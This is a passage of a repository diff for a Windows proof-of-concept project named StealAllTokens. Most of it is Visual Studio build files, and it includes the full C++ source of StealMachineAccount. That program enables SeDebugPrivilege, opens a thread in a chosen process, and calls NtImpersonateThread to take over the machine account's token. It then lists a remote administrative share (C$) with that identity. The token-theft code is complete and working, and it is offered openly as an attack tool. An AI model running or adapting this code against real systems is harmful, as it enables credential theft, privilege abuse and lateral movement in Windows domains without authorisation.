<IntrinsicFunctions>true</IntrinsicFunctions>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="StealAllTokens.cpp" />
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>
</Project>
Win32/Proof of Concepts/StealAllTokens/StealAllTokens/StealAllTokens.vcxproj.filters
+22
View File
@@ -0,0 +1,22 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<Filter Include="Archivos de origen">
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
<Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
</Filter>
<Filter Include="Archivos de encabezado">
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
<Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
</Filter>
<Filter Include="Archivos de recursos">
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
</Filter>
</ItemGroup>
<ItemGroup>
<ClCompile Include="StealAllTokens.cpp">
<Filter>Archivos de origen</Filter>
</ClCompile>
</ItemGroup>
</Project>
Win32/Proof of Concepts/StealAllTokens/StealMachineAccount/StealMachineAccount.cpp
+289
View File
@@ -0,0 +1,289 @@
/********************************************************************
* StealMachineAccount: This PoC takes profit of a privileged
* machine domain account (like for example a local admin or domain admin)
* on a Windows domain, stealing a System token and impersonating
* machine acount for remote auhtentication and listing C$.
* The point here is to impersonate a lower privilege service like RPCSS
* running with NETWORK SERVICE account.
*
* NOTE: We consider that source process has local Admnin privs and
* has High integrity (no SYSTEM account needed)
*********************************************************************/
#include <iostream>
#define MAX_NAME 256
#include <windows.h>
#include <tlhelp32.h>
#include <Lmcons.h>
#include <psapi.h>
#include <windows.h>
#include <tchar.h>
#include <stdio.h>
#include <strsafe.h>
#include <stdlib.h>
std::string get_username()
{
TCHAR username[UNLEN + 1] = { 0 };
DWORD username_len = UNLEN + 1;
int res = GetUserName(username, &username_len);
std::wstring username_w(username);
std::string username_s(username_w.begin(), username_w.end());
return username_s;
}
BOOL SetPrivilege(
HANDLE hToken, // access token handle
LPCTSTR lpszPrivilege, // name of privilege to enable/disable
BOOL bEnablePrivilege // to enable or disable privilege
)
{
TOKEN_PRIVILEGES tp;
LUID luid;
if (!LookupPrivilegeValue(
NULL, // lookup privilege on local system
lpszPrivilege, // privilege to lookup
&luid)) // receives LUID of privilege
{
printf("[-] LookupPrivilegeValue error: %u\n", GetLastError());
return FALSE;
}
tp.PrivilegeCount = 1;
tp.Privileges[0].Luid = luid;
if (bEnablePrivilege)
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
else
tp.Privileges[0].Attributes = 0;
// Enable the privilege or disable all privileges.
if (!AdjustTokenPrivileges(
hToken,
FALSE,
&tp,
sizeof(TOKEN_PRIVILEGES),
(PTOKEN_PRIVILEGES)NULL,
(PDWORD)NULL))
{
printf("[-] AdjustTokenPrivileges error: %u\n", GetLastError());
return FALSE;
}
if (GetLastError() == ERROR_NOT_ALL_ASSIGNED)
{
printf("[-] The token does not have the specified privilege. \n");
return FALSE;
}
return TRUE;
}
HANDLE ListProcessThreads(DWORD dwOwnerPID)
{
HANDLE hThreadSnap = INVALID_HANDLE_VALUE;
THREADENTRY32 te32;
// Take a snapshot of all running threads
hThreadSnap = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
if (hThreadSnap == INVALID_HANDLE_VALUE)
return(FALSE);
// Fill in the size of the structure before using it.
te32.dwSize = sizeof(THREADENTRY32);
// Retrieve information about the first thread,
// and exit if unsuccessful
if (!Thread32First(hThreadSnap, &te32))
{
printf("[-] Error Thread32First\n"); // Show cause of failure
CloseHandle(hThreadSnap); // Must clean up the snapshot object!
return(NULL);
}
// Now walk the thread list of the system,
// and display information about each thread
// associated with the specified process
do
{
if (te32.th32OwnerProcessID == dwOwnerPID)
{
//printf("\n THREAD ID = 0x%08X", te32.th32ThreadID);
//printf("\n base priority = %d", te32.tpBasePri);
//printf("\n delta priority = %d", te32.tpDeltaPri);
HANDLE thandle = OpenThread(THREAD_DIRECT_IMPERSONATION,
TRUE,
te32.th32ThreadID
);
CloseHandle(hThreadSnap);
if (thandle == NULL) {
printf("[-] OpenThread failed\n");
return (NULL);
}
else {
printf("[+] OpenThread 0x%08X success!\n", te32.th32ThreadID);
return (thandle);
}
}
} while (Thread32Next(hThreadSnap, &te32));
printf("[-] Process not found\n");
return (NULL);
}
bool listdirectories(WCHAR *directory)
{
WIN32_FIND_DATA ffd;
LARGE_INTEGER filesize;
TCHAR szDir[MAX_PATH];
size_t length_of_arg;
HANDLE hFind = INVALID_HANDLE_VALUE;
DWORD dwError = 0;
StringCchLength(directory, MAX_PATH, &length_of_arg);
printf("\nTarget directory is %s\n\n", directory);
// Prepare string for use with FindFile functions. First, copy the
// string to a buffer, then append '\*' to the directory name.
StringCchCopy(szDir, MAX_PATH, directory);
StringCchCat(szDir, MAX_PATH, TEXT("\\*"));
// Find the first file in the directory.
hFind = FindFirstFile(szDir, &ffd);
if (INVALID_HANDLE_VALUE == hFind)
{
printf("[-] FindFirstFile INVALID_HANDLE_VALUE! %i\n", GetLastError());
return false;
}
// List all the files in the directory with some info about them.
do
{
if (ffd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)
{
wprintf(L" %ws <DIR>\n", ffd.cFileName);
}
else
{
filesize.LowPart = ffd.nFileSizeLow;
filesize.HighPart = ffd.nFileSizeHigh;
wprintf(L" %ws %ld bytes\n", ffd.cFileName, filesize.QuadPart);
}
} while (FindNextFile(hFind, &ffd) != 0);
dwError = GetLastError();
if (dwError != ERROR_NO_MORE_FILES)
{
printf("[-] FindFirstFile ERROR_NO_MORE_FILES! %i\n", dwError);
return false;
}
FindClose(hFind);
return true;
}
int wmain(int argc, wchar_t** argv)
{
SECURITY_QUALITY_OF_SERVICE sqos = {};
sqos.Length = sizeof(sqos);
sqos.ImpersonationLevel = SecurityImpersonation;
//sqos.ImpersonationLevel = SecurityIdentification;
DWORD bsize = 1024;
CHAR buffer[1024];
HANDLE currentTokenHandle = NULL;
if (argc != 3) {
wprintf(L"usage: %ws <PID> <NetShare>\n", argv[0]);
wprintf(L" Ex. StealMachineAccount 1020 \\WIN-VXQKGX098Q0\C$\n");
}
// Grab PID from command line argument
DWORD pid = _wtoi(argv[1]);
// Add SE debug privilege
BOOL getCurrentToken = OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &currentTokenHandle);
if (SetPrivilege(currentTokenHandle, L"SeDebugPrivilege", TRUE))
{
printf("[+] SeDebugPrivilege enabled!\n");
}
else {
printf("[-] SeDebugPrivilege not enabled!\n");
exit(1);
}
// Call OpenProcess(), print return code and error code
HANDLE processHandle = OpenProcess(PROCESS_QUERY_INFORMATION, true, pid);
if (GetLastError() == NULL) {
//Get process image name
QueryFullProcessImageNameA((HMODULE)processHandle, 0, buffer, &bsize);
if (GetLastError() != NULL)
{
printf("[-] Technique2 QueryFullProcessImageNameA Pid %i Error: %i\n", pid, GetLastError());
return false;
}
printf("[+] Technique2 OpenProcess() %s success with pid %i !\n", buffer, pid);
}
else
{
printf("[-] Technique2 OpenProcess() Pid %i Error: %i\n", pid, GetLastError());
return false;
}
//Get handle from first process thread
HANDLE hThreadToImpersonate = ListProcessThreads(pid);
if (hThreadToImpersonate == NULL)
{
printf("[-] Technique2 Error getting pthread\n");
return false;
}
//Calling NativeAPI NtImpersonateThread
typedef NTSTATUS __stdcall NtImpersonateThread(HANDLE ThreadHandle,
HANDLE ThreadToImpersonate,
PSECURITY_QUALITY_OF_SERVICE SecurityQualityOfService);
NtImpersonateThread* fNtImpersonateThread =
(NtImpersonateThread*)GetProcAddress(GetModuleHandle(L"ntdll"),
"NtImpersonateThread");
// Impersonate user in a thread
BOOL impersonateUser = fNtImpersonateThread(GetCurrentThread(), hThreadToImpersonate, &sqos);
if (GetLastError() == NULL)
{
printf("[+] Technique2 fNtImpersonateThread() %s success!\n", buffer);
printf("[+] Technique2 Current user is: %s\n", (get_username()).c_str());
//wchar_t server[] = L"WIN-VXQKGX098Q0.prueba.com";
if (listdirectories(argv[2]))
printf("[+] Shares listed!\n");
else
printf("[-] listdirectories error!\n");
}
else
{
printf("[-] ImpersonatedLoggedOnUser() Error: %i\n", GetLastError());
}
getchar();
// Closing not necessary handles
CloseHandle(hThreadToImpersonate);
CloseHandle(processHandle);
return true;
}
Win32/Proof of Concepts/StealAllTokens/StealMachineAccount/StealMachineAccount.filters
+22
View File
@@ -0,0 +1,22 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<Filter Include="Archivos de origen">
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
<Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
</Filter>
<Filter Include="Archivos de encabezado">
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
<Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
</Filter>
<Filter Include="Archivos de recursos">
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
</Filter>
</ItemGroup>
<ItemGroup>
<ClCompile Include="StealMachineAccount.cpp">
<Filter>Archivos de origen</Filter>
</ClCompile>
</ItemGroup>
</Project>
Win32/Proof of Concepts/StealAllTokens/StealMachineAccount/StealMachineAccount.vcxproj
+148
View File
@@ -0,0 +1,148 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<VCProjectVersion>16.0</VCProjectVersion>
<Keyword>Win32Proj</Keyword>
<ProjectGuid>{20a29cef-6648-44ac-8b28-b3c362926d3b}</ProjectGuid>
<RootNamespace>StealMachineAccount</RootNamespace>
<WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
<ProjectName>StealMachineAccount</ProjectName>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v142</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v142</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v142</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v142</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
<ImportGroup Label="Shared">
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="StealMachineAccount.cpp" />
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>
</Project>